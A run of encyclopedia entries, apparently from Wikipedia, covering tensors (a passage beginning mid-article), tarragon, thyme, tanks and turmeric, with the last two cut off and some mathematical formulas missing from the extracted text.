isomorphic. Constructions of spaces of tensors based on the tensor product and multilinear mappings can be generalized, essentially without modification, to vector bundles or coherent sheaves. For infinite-dimensional vector spaces, inequivalent topologies lead to inequivalent notions of tensor, and these various isomorphisms may or may not hold depending on what exactly is meant by a tensor (see topological tensor product). In some applications, it is the tensor product of Hilbert spaces that is intended, whose properties are the most similar to the finite-dimensional case. A more modern view is that it is the tensors' structure as a symmetric monoidal category that encodes their most important properties, rather than the specific models of those categories. Tensor fields In many applications, especially in differential geometry and physics, it is natural to consider a tensor with components that are functions of the point in a space. This was the setting of Ricci's original work. In modern mathematical terminology such an object is called a tensor field, often referred to simply as a tensor. In this context, a coordinate basis is often chosen for the tangent vector space. The transformation law may then be expressed in terms of partial derivatives of the coordinate functions, defining a coordinate transformation, History The concepts of later tensor analysis arose from the work of Carl Friedrich Gauss in differential geometry, and the formulation was much influenced by the theory of algebraic forms and invariants developed during the middle of the nineteenth century. The word "tensor" itself was introduced in 1846 by William Rowan Hamilton to describe something different from what is now meant by a tensor. Gibbs introduced dyadics and polyadic algebra, which are also tensors in the modern sense. The contemporary usage was introduced by Woldemar Voigt in 1898. Tensor calculus was developed around 1890 by Gregorio Ricci-Curbastro under the title absolute differential calculus, and originally presented in 1892. It was made accessible to many mathematicians by the publication of Ricci-Curbastro and Tullio Levi-Civita's 1900 classic text Méthodes de calcul différentiel absolu et leurs applications (Methods of absolute differential calculus and their applications). In Ricci's notation, he refers to "systems" with covariant and contravariant components, which are known as tensor fields in the modern sense. In the 20th century, the subject came to be known as tensor analysis, and achieved broader acceptance with the introduction of Albert Einstein's theory of general relativity, around 1915. General relativity is formulated completely in the language of tensors. Einstein had learned about them, with great difficulty, from the geometer Marcel Grossmann. Levi-Civita then initiated a correspondence with Einstein to correct mistakes Einstein had made in his use of tensor analysis. The correspondence lasted 1915–17, and was characterized by mutual respect: Tensors and tensor fields were also found to be useful in other fields such as continuum mechanics. Some well-known examples of tensors in differential geometry are quadratic forms such as metric tensors, and the Riemann curvature tensor. The exterior algebra of Hermann Grassmann, from the middle of the nineteenth century, is itself a tensor theory, and highly geometric, but it was some time before it was seen, with the theory of differential forms, as naturally unified with tensor calculus. The work of Élie Cartan made differential forms one of the basic kinds of tensors used in mathematics, and Hassler Whitney popularized the tensor product. From about the 1920s onwards, it was realised that tensors play a basic role in algebraic topology (for example in the Künneth theorem). Correspondingly there are types of tensors at work in many branches of abstract algebra, particularly in homological algebra and representation theory. Multilinear algebra can be developed in greater generality than for scalars coming from a field. For example, scalars can come from a ring. But the theory is then less geometric and computations more technical and less algorithmic. Tensors are generalized within category theory by means of the concept of monoidal category, from the 1960s. Examples An elementary example of a mapping describable as a tensor is the dot product, which maps two vectors to a scalar. A more complex example is the Cauchy stress tensor T, which takes a directional unit vector v as input and maps it to the stress vector T(v), which is the force (per unit area) exerted by material on the negative side of the plane orthogonal to v against the material on the positive side of the plane, thus expressing a relationship between these two vectors, shown in the figure (right). The cross product, where two vectors are mapped to a third one, is strictly speaking not a tensor because it changes its sign under those transformations that change the orientation of the coordinate system. The totally anti-symmetric symbol nevertheless allows a convenient handling of the cross product in equally oriented three dimensional coordinate systems. This table shows important examples of tensors on vector spaces and tensor fields on manifolds. The tensors are classified according to their type , where n is the number of contravariant indices, m is the number of covariant indices, and gives the total order of the tensor. For example, a bilinear form is the same thing as a -tensor; an inner product is an example of a -tensor, but not all -tensors are inner products. In the -entry of the table, M denotes the dimensionality of the underlying vector space or manifold because for each dimension of the space, a separate index is needed to select that dimension to get a maximally covariant antisymmetric tensor. Raising an index on an -tensor produces an -tensor; this corresponds to moving diagonally down and to the left on the table. Symmetrically, lowering an index corresponds to moving diagonally up and to the right on the table. Contraction of an upper with a lower index of an -tensor produces an -tensor; this corresponds to moving diagonally up and to the left on the table. Properties Assuming a basis of a real vector space, e.g., a coordinate frame in the ambient space, a tensor can be represented as an organized multidimensional array of numerical values with respect to this specific basis. Changing the basis transforms the values in the array in a characteristic way that allows to define tensors as objects adhering to this transformational behavior. For example, there are invariants of tensors that must be preserved under any change of the basis, thereby making only certain multidimensional arrays of numbers a tensor. Compare this to the array representing not being a tensor, for the sign change under transformations changing the orientation. Because the components of vectors and their duals transform differently under the change of their dual bases, there is a covariant and/or contravariant transformation law that relates the arrays, which represent the tensor with respect to one basis and that with respect to the other one. The numbers of, respectively, (contravariant indices) and dual (covariant indices) in the input and output of a tensor determine the type (or valence) of the tensor, a pair of natural numbers , which determine the precise form of the transformation law. The of a tensor is the sum of these two numbers. The order (also degree or ) of a tensor is thus the sum of the orders of its arguments plus the order of the resulting tensor. This is also the dimensionality of the array of numbers needed to represent the tensor with respect to a specific basis, or equivalently, the number of indices needed to label each component in that array. For example, in a fixed basis, a standard linear map that maps a vector to a vector, is represented by a matrix (a 2-dimensional array), and therefore is a 2nd-order tensor. A simple vector can be represented as a 1-dimensional array, and is therefore a 1st-order tensor. Scalars are simple numbers and are thus 0th-order tensors. This way the tensor representing the scalar product, taking two vectors and resulting in a scalar has order , the same as the stress tensor, taking one vector and returning another . The mapping two vectors to one vector, would have order The collection of tensors on a vector space and its dual forms a tensor algebra, which allows products of arbitrary tensors. Simple applications of tensors of order , which can be represented as a square matrix, can be solved by clever arrangement of transposed vectors and by applying the rules of matrix multiplication, but the tensor product should not be confused with this. Notation There are several notational systems that are used to describe tensors and perform calculations involving them. Ricci calculus Ricci calculus is the modern formalism and notation for tensor indices: indicating inner and outer products, covariance and contravariance, summations of tensor components, symmetry and antisymmetry, and partial and covariant derivatives. Einstein summation convention The Einstein summation convention dispenses with writing summation signs, leaving the summation implicit. Any repeated index symbol is summed over: if the index is used twice in a given term of a tensor expression, it means that the term is to be summed for all . Several distinct pairs of indices may be summed this way. Penrose graphical notation Penrose graphical notation is a diagrammatic notation which replaces the symbols for tensors with shapes, and their indices by lines and curves. It is independent of basis elements, and requires no symbols for the indices. Abstract index notation The abstract index notation is a way to write tensors such that the indices are no longer thought of as numerical, but rather are indeterminates. This notation captures the expressiveness of indices and the basis-independence of index-free notation. Component-free notation A component-free treatment of tensors uses notation that emphasises that tensors do not rely on any basis, and is defined in terms of the tensor product of vector spaces. Operations There are several operations on tensors that again produce a tensor. The linear nature of tensor implies that two tensors of the same type may be added together, and that tensors may be multiplied by a scalar with results analogous to the scaling of a vector. On components, these operations are simply performed component-wise. These operations do not change the type of the tensor; but there are also operations that produce a tensor of different type. Tensor product The tensor product takes two tensors, S and T, and produces a new tensor, , whose order is the sum of the orders of the original tensors. When described as multilinear maps, the tensor product simply multiplies the two tensors, i.e., which again produces a map that is linear in all its arguments. On components, the effect is to multiply the components of the two input tensors pairwise, i.e., If is of type and is of type , then the tensor product has type . Contraction Tensor contraction is an operation that reduces a type tensor to a type tensor, of which the trace is a special case. It thereby reduces the total order of a tensor by two. The operation is achieved by summing components for which one specified contravariant index is the same as one specified covariant index to produce a new component. Components for which those two indices are different are discarded. For example, a -tensor can be contracted to a scalar through , where the summation is again implied. When the -tensor is interpreted as a linear map, this operation is known as the trace. The contraction is often used in conjunction with the tensor product to contract an index from each tensor. The contraction can also be understood using the definition of a tensor as an element of a tensor product of copies of the space V with the space V∗ by first decomposing the tensor into a linear combination of simple tensors, and then applying a factor from V∗ to a factor from V. For example, a tensor can be written as a linear combination The contraction of T on the first and last slots is then the vector In a vector space with an inner product (also known as a metric) g, the term contraction is used for removing two contravariant or two covariant indices by forming a trace with the metric tensor or its inverse. For example, a -tensor can be contracted to a scalar through (yet again assuming the summation convention). Raising or lowering an index When a vector space is equipped with a nondegenerate bilinear form (or metric tensor as it is often called in this context), operations can be defined that convert a contravariant (upper) index into a covariant (lower) index and vice versa. A metric tensor is a (symmetric) (-tensor; it is thus possible to contract an upper index of a tensor with one of the lower indices of the metric tensor in the product. This produces a new tensor with the same index structure as the previous tensor, but with lower index generally shown in the same position of the contracted upper index. This operation is quite graphically known as lowering an index. Conversely, the inverse operation can be defined, and is called raising an index. This is equivalent to a similar contraction on the product with a -tensor. This inverse metric tensor has components that are the matrix inverse of those of the metric tensor. Applications Continuum mechanics Important examples are provided by continuum mechanics. The stresses inside a solid body or fluid are described by a tensor field. The stress tensor and strain tensor are both second-order tensor fields, and are related in a general linear elastic material by a fourth-order elasticity tensor field. In detail, the tensor quantifying stress in a 3-dimensional solid object has components that can be conveniently represented as a 3 × 3 array. The three faces of a cube-shaped infinitesimal volume segment of the solid are each subject to some given force. The force's vector components are also three in number. Thus, 3 × 3, or 9 components are required to describe the stress at this cube-shaped infinitesimal segment. Within the bounds of this solid is a whole mass of varying stress quantities, each requiring 9 quantities to describe. Thus, a second-order tensor is needed. If a particular surface element inside the material is singled out, the material on one side of the surface will apply a force on the other side. In general, this force will not be orthogonal to the surface, but it will depend on the orientation of the surface in a linear manner. This is described by a tensor of type , in linear elasticity, or more precisely by a tensor field of type , since the stresses may vary from point to point. Other examples from physics Common applications include: Electromagnetic tensor (or Faraday tensor) in electromagnetism Finite deformation tensors for describing deformations and strain tensor for strain in continuum mechanics Permittivity and electric susceptibility are tensors in anisotropic media Four-tensors in general relativity (e.g. stress–energy tensor), used to represent momentum fluxes Spherical tensor operators are the eigenfunctions of the quantum angular momentum operator in spherical coordinates Diffusion tensors, the basis of diffusion tensor imaging, represent rates of diffusion in biological environments Quantum mechanics and quantum computing utilize tensor products for combination of quantum states Computer vision and optics The concept of a tensor of order two is often conflated with that of a matrix. Tensors of higher order do however capture ideas important in science and engineering, as has been shown successively in numerous areas as they develop. This happens, for instance, in the field of computer vision, with the trifocal tensor generalizing the fundamental matrix. The field of nonlinear optics studies the changes to material polarization density under extreme electric fields. The polarization waves generated are related to the generating electric fields through the nonlinear susceptibility tensor. If the polarization P is not linearly proportional to the electric field E, the medium is termed nonlinear. To a good approximation (for sufficiently weak fields, assuming no permanent dipole moments are present), P is given by a Taylor series in E whose coefficients are the nonlinear susceptibilities: Here is the linear susceptibility, gives the Pockels effect and second harmonic generation, and gives the Kerr effect. This expansion shows the way higher-order tensors arise naturally in the subject matter. Machine learning The properties of tensors, especially tensor decomposition, have enabled their use in machine learning to embed higher dimensional data in artificial neural networks. This notion of tensor differs significantly from that in other areas of mathematics and physics, in the sense that a tensor is usually regarded as a numerical quantity in a fixed basis, and the dimension of the spaces along the different axes of the tensor need not be the same. Generalizations Tensor products of vector spaces The vector spaces of a tensor product need not be the same, and sometimes the elements of such a more general tensor product are called "tensors". For example, an element of the tensor product space is a second-order "tensor" in this more general sense, and an order- tensor may likewise be defined as an element of a tensor product of different vector spaces. A type tensor, in the sense defined previously, is also a tensor of order in this more general sense. The concept of tensor product can be extended to arbitrary modules over a ring. Tensors in infinite dimensions The notion of a tensor can be generalized in a variety of ways to infinite dimensions. One, for instance, is via the tensor product of Hilbert spaces. Another way of generalizing the idea of tensor, common in nonlinear analysis, is via the multilinear maps definition where instead of using finite-dimensional vector spaces and their algebraic duals, one uses infinite-dimensional Banach spaces and their continuous dual. Tensors thus live naturally on Banach manifolds and Fréchet manifolds. Tensor densities Suppose that a homogeneous medium fills , so that the density of the medium is described by a single scalar value in . The mass, in kg, of a region is obtained by multiplying by the volume of the region , or equivalently integrating the constant over the region: where the Cartesian coordinates , , are measured in . If the units of length are changed into , then the numerical values of the coordinate functions must be rescaled by a factor of 100: The numerical value of the density must then also transform by to compensate, so that the numerical value of the mass in kg is still given by integral of . Thus (in units of ). More generally, if the Cartesian coordinates , , undergo a linear transformation, then the numerical value of the density must change by a factor of the reciprocal of the absolute value of the determinant of the coordinate transformation, so that the integral remains invariant, by the change of variables formula for integration. Such a quantity that scales by the reciprocal of the absolute value of the determinant of the coordinate transition map is called a scalar density. To model a non-constant density, is a function of the variables , , (a scalar field), and under a curvilinear change of coordinates, it transforms by the reciprocal of the Jacobian of the coordinate change. For more on the intrinsic meaning, see Density on a manifold. A tensor density transforms like a tensor under a coordinate change, except that it in addition picks up a factor of the absolute value of the determinant of the coordinate transition: Here is called the weight. In general, any tensor multiplied by a power of this function or its absolute value is called a tensor density, or a weighted tensor. An example of a tensor density is the current density of electromagnetism. Under an affine transformation of the coordinates, a tensor transforms by the linear part of the transformation itself (or its inverse) on each index. These come from the rational representations of the general linear group. But this is not quite the most general linear transformation law that such an object may have: tensor densities are non-rational, but are still semisimple representations. A further class of transformations come from the logarithmic representation of the general linear group, a reducible but not semisimple representation, consisting of an with the transformation law Geometric objects The transformation law for a tensor behaves as a functor on the category of admissible coordinate systems, under general linear transformations (or, other transformations within some class, such as local diffeomorphisms). This makes a tensor a special case of a geometrical object, in the technical sense that it is a function of the coordinate system transforming functorially under coordinate changes. Examples of objects obeying more general kinds of transformation laws are jets and, more generally still, natural bundles. Spinors When changing from one orthonormal basis (called a frame) to another by a rotation, the components of a tensor transform by that same rotation. This transformation does not depend on the path taken through the space of frames. However, the space of frames is not simply connected (see orientation entanglement and plate trick): there are continuous paths in the space of frames with the same beginning and ending configurations that are not deformable one into the other. It is possible to attach an additional discrete invariant to each frame that incorporates this path dependence, and which turns out (locally) to have values of ±1. A spinor is an object that transforms like a tensor under rotations in the frame, apart from a possible sign that is determined by the value of this discrete invariant. Spinors are elements of the spin representation of the rotation group, while tensors are elements of its tensor representations. Other classical groups have tensor representations, and so also tensors that are compatible with the group, but all non-compact classical groups have infinite-dimensional unitary representations as well.
Mathematics
Geometry
null
29967
https://en.wikipedia.org/wiki/Tarragon
Tarragon
Tarragon (Artemisia dracunculus), also known as estragon, is a species of perennial herb in the family Asteraceae. It is widespread in the wild across much of Eurasia and North America and is cultivated for culinary and medicinal purposes. One subspecies, Artemisia dracunculus var. sativa, is cultivated to use the leaves as an aromatic culinary herb. In some other subspecies, the characteristic aroma is largely absent. Informal names for distinguishing the variations include "French tarragon" (best for culinary use) and "Russian tarragon". Tarragon grows to tall, with slender branches. The leaves are lanceolate, long and broad, glossy green, with an entire margin. The flowers are produced in small capitula diameter, each capitulum containing up to 40 yellow or greenish-yellow florets. French tarragon, however, seldom produces any flowers (or seeds). Some tarragon plants produce seeds that are generally sterile. Others produce viable seeds. Tarragon has rhizomatous roots that it uses to spread and readily reproduce. Cultivation French tarragon is the variety used for cooking in the kitchen and is not grown from seed, as the flowers are sterile; instead, it is propagated by root division. Russian tarragon (A. dracunculoides L.) can be grown from seed but is much weaker in flavor when compared to the French variety. However, Russian tarragon is a far more hardy and vigorous plant, spreading at the roots and growing over a meter tall. This tarragon actually prefers poor soils and happily tolerates drought and neglect. It is not as intensely aromatic and flavorsome as its French cousin, but it produces many more leaves from early spring onwards that are mild and good in salads and cooked food. Russian tarragon loses what flavor it has as it ages and is widely considered useless as a culinary herb, though it is sometimes used in crafts. The young stems in early spring can be cooked as an asparagus substitute. Horticulturists recommend that Russian tarragon be grown indoors from seed and planted in summer. The spreading plants can be divided easily. A better substitute for Russian tarragon is Mexican tarragon (Tagetes lucida), also known as Mexican mint marigold, Texas tarragon, or winter tarragon. It is much more reminiscent of French tarragon, with a hint of anise. Although not in the same genus as the other tarragons, Mexican tarragon has a more robust flavor than Russian tarragon that does not diminish significantly with age. It can not however be grown as a perennial in cold climates. Health Tarragon has a flavor and odor profile reminiscent of anise due largely to the presence of estragole, a known carcinogen and teratogen in mice. Estragole concentration in fresh tarragon leaves is about 2900 mg/kg. However, a European Union investigation concluded that the danger of estragole is minimal. Research studying rat livers found a BMDL10 (Approximately the dose that would cause a 10% increase in background tumor rate) of estragole to be 3.3–6.5 mg/kg body weight per day, which for a 80 kg human would be ~400 mg per day, or 130 g of fresh tarragon leaves per day. As used as a culinary herb, a typical quantity used in a dish could be 5 g of fresh leaves. Estragole, along with other oils that provide tarragon its flavor, are highly volatile and will vaporise as the leaf is dried, reducing both the health risk and the useability of the herb. Several other herbs, such as basil, also contain estragole. Uses Culinary use In Syria, fresh tarragon is eaten with white Syrian cheese, and also used with dishes such as shish barak and kibbeh labaniyeh. In Iran, tarragon is used as a side dish in sabzi khordan(fresh herbs), or in stews and Persian-style pickles, particularly khiar shoor (pickled cucumbers). Tarragon is one of the four fines herbes of French cooking and is particularly suitable for chicken, fish, and egg dishes. Tarragon is the main flavoring component of Béarnaise sauce. Fresh, lightly bruised tarragon sprigs are steeped in vinegar to produce tarragon vinegar. Pounded with butter, it produces an excellent topping for grilled salmon or beef. Tarragon is used to flavor a popular carbonated soft drink in Armenia, Azerbaijan, Georgia (where it originally comes from), and, by extension, Russia, Ukraine and Kazakhstan. The drink, named Tarkhun, is made out of sugar, carbonated water, and tarragon leaves which give it its signature green color. Tarragon is one of the main ingredients in Chakapuli, a Georgian national dish. In Slovenia, tarragon is used in a variation of the traditional nut roll sweet cake, called potica. In Hungary, a popular chicken soup is flavored with tarragon. Chemistry Gas chromatography/mass spectrometry analysis has revealed that A. dracunculus oil contains predominantly phenylpropanoids such as estragole (16.2%), methyl eugenol (35.8%), and trans-anethole (21.1%). The other major constituents were terpenes and terpenoids, including α-trans-ocimene (20.6%), limonene (12.4%), α-pinene (5.1%), allo-ocimene (4.8%), methyl eugenol (2.2%), β-pinene (0.8%), α-terpinolene (0.5%), bornyl acetate (0.5%) and bicyclogermacrene (0.5%). The organic compound capillin was initially isolated from Artemisia capillaris in 1956. cis-Pellitorin, an isobutyramide eliciting a pungent taste, has been isolated from the tarragon plant. Name The plant is commonly known as in Swedish and Dutch. The use of for the herb or plant in German is outdated. The species name, , means "little dragon", and the plant seems to be so named due to its coiled roots. See Artemisia for the genus name derivative.
Biology and health sciences
Herbs and spices
Plants
29968
https://en.wikipedia.org/wiki/Thyme
Thyme
Thyme () is a culinary herb consisting of the dried aerial parts of some members of the genus Thymus of flowering plants in the mint family Lamiaceae. Thymes are native to Eurasia and north Africa. Thymes have culinary, medicinal, and ornamental uses. The species most commonly cultivated and used for culinary purposes is Thymus vulgaris, native to Southeast Europe. History Wild thyme grows in the Levant, where it might have been first cultivated. Ancient Egyptians used common thyme (Thymus vulgaris) for embalming. The ancient Greeks used it in their baths and burnt it as incense in their temples, believing it was a source of courage. The spread of thyme throughout Europe was thought to be due to the Romans, as they used it to purify their rooms and to "give an aromatic flavour to cheese and liqueurs". In the European Middle Ages, the herb was placed beneath pillows to aid sleep and ward off nightmares. In this period, women also often gave knights and warriors gifts that included thyme leaves, as it was believed to bring courage to the bearer. Thyme was also used as incense and placed on coffins during funerals, as it was supposed to assure passage into the next life. The name of the genus of fish Thymallus, first given to the grayling (T. thymallus, described in the 1758 edition of Systema Naturae by Swedish zoologist Carl Linnaeus), originates from the faint smell of thyme that emanates from the flesh. Cultivation Thyme is best cultivated in a hot, sunny location with well-drained soil. It is generally planted in the spring, and thereafter grows as a perennial. It can be propagated by seed, cuttings, or dividing rooted sections of the plant. It tolerates drought well. It can be pruned after flowering to keep from getting woody. Culinary use In some Levantine countries, the condiment za'atar (Arabic for both thyme and marjoram) contains many of the essential oils found in thyme. Thyme is a common component of the bouquet garni, and of herbes de Provence. Thyme is sold both fresh and dried. While summer-seasonal, fresh greenhouse thyme is often available year-round. The fresh form is more flavourful but also less convenient; storage life is rarely more than a week. However, the fresh form can last many months if carefully frozen, and thyme retains its flavour on drying better than many other herbs. Fresh thyme is commonly sold in bunches of sprigs. A sprig is a single stem snipped from the plant. It is composed of a woody stem with paired leaf or flower clusters ("leaves") spaced apart. A recipe may measure thyme by the bunch (or fraction thereof), or by the sprig, or by the tablespoon or teaspoon. Dried thyme is widely used in Armenia in tisanes. Depending on how it is used in a dish, the whole sprig may be used, or the leaves removed and the stems discarded. Usually, when a recipe mentions a bunch or sprig, it means the whole form; when it mentions spoons, it means the leaves. It is perfectly acceptable to substitute dried for whole thyme. Leaves may be removed from stems either by scraping with the back of a knife, or by pulling through the fingers or tines of a fork. In Moroccan tradition, dried figs are elevated with the infusion of minty leaves. After softening in a couscous pot, the figs are rested with additional minty leaves before being sprinkled with thyme for a delightful flavor enhancement and preservation in sealed containers. Chemical and antimicrobial properties The chemical composition of Thymus (thyme) includes a variety of essential oils, flavonoids, phenolic acids, triterpenes, and other compounds. The essential oils found in thyme include thymol, which is a major component responsible for the plant's antiseptic properties, and carvacrol, another primary component with similar functions. Other essential oils present are p-cymene, γ-terpinene, linalool, and 1,8-cineole. Gas chromatographic analysis reveals that the most abundant volatile component of thyme leaves is thymol, at 8.55mg/g. Other components are carvacrol, linalool, α-terpineol, and 1,8-cineole. Some of these compounds have beneficial properties. In particular, thymol has been historically used as an antibiotic and antiseptic, especially in traditional medicine. Oil of thyme, the essential oil of common thyme, contains 20–54% thymol. Thymol is an active ingredient in various commercially produced mouthwashes, such as Listerine. Flavonoids in thyme include luteolin-7-O-glucoside, a glycoside known for its antioxidant and anti-inflammatory properties, as well as apigenin, quercetin, and kaempferol. Phenolic acids such as rosmarinic acid, which is known for its antioxidant, anti-inflammatory, and antimicrobial activities, along with caffeic acid and chlorogenic acid, are also present in thyme. Triterpenes, such as oleanolic acid and ursolic acid, are part of thyme's composition, contributing to its overall health benefits. Additionally, thyme contains tannins, which contribute to its astringent properties, as well as saponins and other minor compounds. Important species and cultivars Thymus citriodorus – various lemon thymes, orange thymes, lime thyme Thymus herba-barona (caraway thyme) is used both as a culinary herb and a ground cover, and has a very strong caraway scent due to the chemical carvone. Thymus praecox (mother of thyme, wild thyme), is cultivated as an ornamental, but is in Iceland also gathered as a wild herb for cooking, and drunk as a warm infusion. Thymus pseudolanuginosus (woolly thyme) is not a culinary herb, but is grown as a ground cover. Thymus serpyllum (wild thyme, creeping thyme) is an important nectar source plant for honeybees. All thyme species are nectar sources, but wild thyme covers large areas of droughty, rocky soils in southern Europe (both Greece and Malta are especially famous for wild thyme honey) and North Africa, as well as in similar landscapes in the Berkshire and Catskill Mountains of the northeastern US. The lowest growing of the widely used thyme is good for walkways. It is also an important caterpillar food plant for large and common blue butterflies. Thymus vulgaris (common thyme, English thyme, summer thyme, winter thyme, French thyme, or garden thyme) is a commonly used culinary herb. It also has medicinal uses. Common thyme is a Mediterranean perennial which is best suited to well-drained soils and full sun.
Biology and health sciences
Lamiales
null
29970
https://en.wikipedia.org/wiki/Tank
Tank
A tank is an armoured fighting vehicle intended as a primary offensive weapon in front-line ground combat. Tank designs are a balance of heavy firepower, strong armour, and battlefield mobility provided by tracks and a powerful engine; their main armament is often mounted within a turret. They are a mainstay of modern 20th and 21st century ground forces and a key part of combined arms combat. Modern tanks are versatile mobile land weapons platforms whose main armament is a large-calibre tank gun mounted in a rotating gun turret, supplemented by machine guns or other ranged weapons such as anti-tank guided missiles or rocket launchers. They have heavy vehicle armour which provides protection for the crew, the vehicle's munition storage, fuel tank and propulsion systems. The use of tracks rather than wheels provides improved operational mobility which allows the tank to overcome rugged terrain and adverse conditions such as mud and ice/snow better than wheeled vehicles, and thus be more flexibly positioned at advantageous locations on the battlefield. These features enable the tank to perform in a variety of intense combat situations, simultaneously both offensively (with direct fire from their powerful main gun) and defensively (as fire support and defilade for friendly troops due to the near invulnerability to common infantry small arms and good resistance against heavier weapons, although anti-tank weapons used in 2022, some of them man-portable, have demonstrated the ability to destroy older generations of tanks with single shots), all while maintaining the mobility needed to exploit changing tactical situations. Fully integrating tanks into modern military forces spawned a new era of combat, armoured warfare. Until the invention of the main battle tank, tanks were typically categorized either by weight class (light, medium, heavy or superheavy tanks) or doctrinal purpose (breakthrough-, cavalry-, infantry-, cruiser-, or reconnaissance tanks). Some are larger and more thickly armoured and with large guns, while others are smaller, lightly armoured, and equipped with a smaller caliber and lighter gun. These smaller tanks move over terrain with speed and agility and can perform a reconnaissance role in addition to engaging hostile targets. The smaller, faster tank would not normally engage in battle with a larger, heavily armoured tank, except during a surprise flanking manoeuvre. Etymology The word tank was first applied in a military context to British "landships" in 1915 to keep their nature secret before they entered service. Origins On 24 December 1915, a meeting took place of the Inter-Departmental Conference (including representatives of the Director of Naval Construction's Committee, the Admiralty, the Ministry of Munitions, and the War Office). Its purpose was to discuss the progress of the plans for what were described as "Caterpillar Machine Gun Destroyers or Land Cruisers." In his autobiography, Albert Gerald Stern (Secretary to the Landship Committee, later head of the Mechanical Warfare Supply Department) says that at that meeting: He incorrectly added, "and the name has now been adopted by all countries in the world." Lieutenant-Colonel Ernest Swinton, who was secretary to the meeting, says that he was instructed to find a non-committal word when writing his report of the proceedings. In the evening he discussed it with a fellow officer, Lt-Col Walter Dally Jones, and they chose the word "tank". "That night, in the draft report of the conference, the word 'tank' was employed in its new sense for the first time." Swinton's
Technology
Military technology: General
null
29973
https://en.wikipedia.org/wiki/Turmeric
Turmeric
Turmeric (), or Curcuma longa (), is a flowering plant in the ginger family Zingiberaceae. It is a perennial, rhizomatous, herbaceous plant native to the Indian subcontinent and Southeast Asia that requires temperatures between and high annual rainfall to thrive. Plants are gathered each year for their rhizomes, some for propagation in the following season and some for consumption. The rhizomes are used fresh or boiled in water and dried, after which they are ground into a deep orange-yellow powder commonly used as a coloring and flavoring agent in many Asian cuisines, especially for curries, as well as for the dyeing characteristics imparted by the principal turmeric constituent, curcumin. Turmeric powder has a warm, bitter, black pepper-like flavor and earthy, mustard-like aroma. Curcumin, a bright yellow chemical produced by the turmeric plant, is approved as a food additive by the World Health Organization, European Parliament, and United States Food and Drug Administration. Although long used in Ayurvedic medicine, there is no high-quality clinical evidence that consuming turmeric or curcumin is effective for treating any disease. Origin and distribution The greatest diversity of Curcuma species by number alone is in India, at around 40 to 45 species. Thailand has a comparable 30 to 40 species. Other countries in tropical Asia also have numerous wild species of Curcuma. Recent studies have also shown that the taxonomy of C. longa is problematic, with only the specimens from South India being identifiable as C. longa. The phylogeny, relationships, intraspecific and interspecific variation, and even identity of other species and cultivars in other parts of the world still need to be established and validated. Various species currently utilized and sold as "turmeric" in other parts of Asia have been shown to belong to several physically similar taxa, with overlapping local names. History Turmeric has been used in Asia for centuries and is a major part of Ayurveda, Siddha medicine, traditional Chinese medicine, Unani, and the animistic rituals of Austronesian peoples. It was first used as a dye, and then later for its supposed properties in folk medicine. In India, it spread with Hinduism and Buddhism, as the yellow dye is used to color the robes of monks and priests. In Island Southeast Asia, there is linguistic and circumstantial evidence of the ancient use of turmeric among the Austronesian peoples soon after dispersal from Taiwan (starting ), before contact with India. In Indonesia and the Philippines, turmeric was used for food, dyeing textiles, medicine, as well as body painting. It was commonly an important ingredient in various animistic rituals. Kikusawa and Reid (2007) have concluded that *kunij, the oldest reconstructed Proto-Malayo-Polynesian form for "turmeric" in the Austronesian languages, is primarily associated with the importance of its use as a dye. Other members of the genus Curcuma native to Southeast Asia (like Curcuma zedoaria) were also used for food and spice, but not as dyes. Turmeric (along with Curcuma zedoaria) was also spread with the Lapita people of the Austronesian expansion into Oceania. Turmeric can only be propagated with rhizomes, thus its pre-contact distribution into the Pacific Islands can only be via human introduction. The populations in Micronesia, Island Melanesia, and Polynesia (including as far as Hawaii and Easter Island) use turmeric widely for both food and dye before European contact. In Micronesia, it was an important trade item in the sawei maritime exchange between Yap and further atolls in the Carolines, where it couldn't grow. In some smaller islands, the dye was extracted from the leaves, since the rhizomes remained too small in sandy soils. It was also carried by the Austronesian migrations to Madagascar. Turmeric was found in Farmana, dating to between 2600 and 2200 BCE, and in a merchant's tomb in Megiddo, Israel, dating from the second millennium BCE. It was noted as a dye plant in the Assyrians' Cuneiform medical texts from Ashurbanipal’s library at Nineveh from 7th century BCE. In Medieval Europe, turmeric was called "Indian saffron." Etymology The name possibly derives from Middle English or Early Modern English as or . It may be of Latin origin, ("meritorious earth"). The Latin specific epithet longa means long. Description Turmeric is a perennial herbaceous plant that reaches up to tall. It has highly branched, yellow to orange, cylindrical, aromatic rhizomes. The leaves are alternate and arranged in two rows. They are divided into leaf sheath, petiole, and leaf blade. From the leaf sheaths, a false stem is formed. The petiole is long. The simple leaf blades are usually long and rarely up to . They have a width of and are oblong to elliptical, narrowing at the tip. Inflorescence, flower, and fruit At the top of the inflorescence, stem bracts are present on which no flowers occur; these are white to green and sometimes tinged reddish-purple, and the upper ends are tapered. The hermaphrodite flowers are zygomorphic and threefold. The three sepals are long, fused, and white, and have fluffy hairs; the three calyx teeth are unequal. The three bright-yellow petals are fused into a corolla tube up to long. The three corolla lobes have a length of and are triangular with soft-spiny upper ends. While the average corolla lobe is larger than the two lateral, only the median stamen of the inner circle is fertile. The dust bag is spurred at its base. All other stamens are converted to staminodes. The outer staminodes are shorter than the labellum. The labellum is yellowish, with a yellow ribbon in its center and it is obovate, with a length from . Three carpels are under a constant, trilobed ovary adherent, which is sparsely hairy. The fruit capsule opens with three compartments. In East Asia, the flowering time is usually in August. Terminally on the false stem is an inflorescence stem, long, containing many flowers. The bracts are light green and ovate to oblong with a blunt upper end with a length of . Phytochemistry Turmeric powder is about 60–70% carbohydrates, 6–13% water, 6–8% protein, 5–10% fat, 3–7% dietary minerals, 3–7% essential oils, 2–7% dietary fiber, and 1–6% curcuminoids. The golden yellow color of turmeric is due to curcumin. Phytochemical components of turmeric include diarylheptanoids, a class including numerous curcuminoids, such as curcumin, demethoxycurcumin, and bisdemethoxycurcumin. Curcumin constitutes up to 3.14% of assayed commercial samples of turmeric powder (the average was 1.51%); curry powder contains much less (an average of 0.29%). Some 34 essential oils are present in turmeric, among which turmerone, germacrone, atlantone, and zingiberene are major constituents. Uses Culinary Turmeric is one of the key ingredients in many Asian dishes, imparting a mustard-like, earthy aroma and pungent, slightly bitter flavor to foods. It is used mostly in savory dishes, but also is used in some sweet dishes, such as the cake sfouf. In India, turmeric leaf is used to prepare special sweet dishes, patoleo, by layering rice flour and coconut-jaggery mixture on the leaf, then closing and steaming it in a special utensil (chondrõ). Most turmeric is used in the form of rhizome powder to impart a golden yellow color. It is used in many products such as canned beverages, baked products, dairy products, ice cream, yogurt, yellow cakes, orange juice, biscuits, popcorn, cereals and sauces. It is a principal ingredient in curry powders. Although typically used in its dried, powdered form, turmeric also is used fresh, like ginger. Turmeric is used 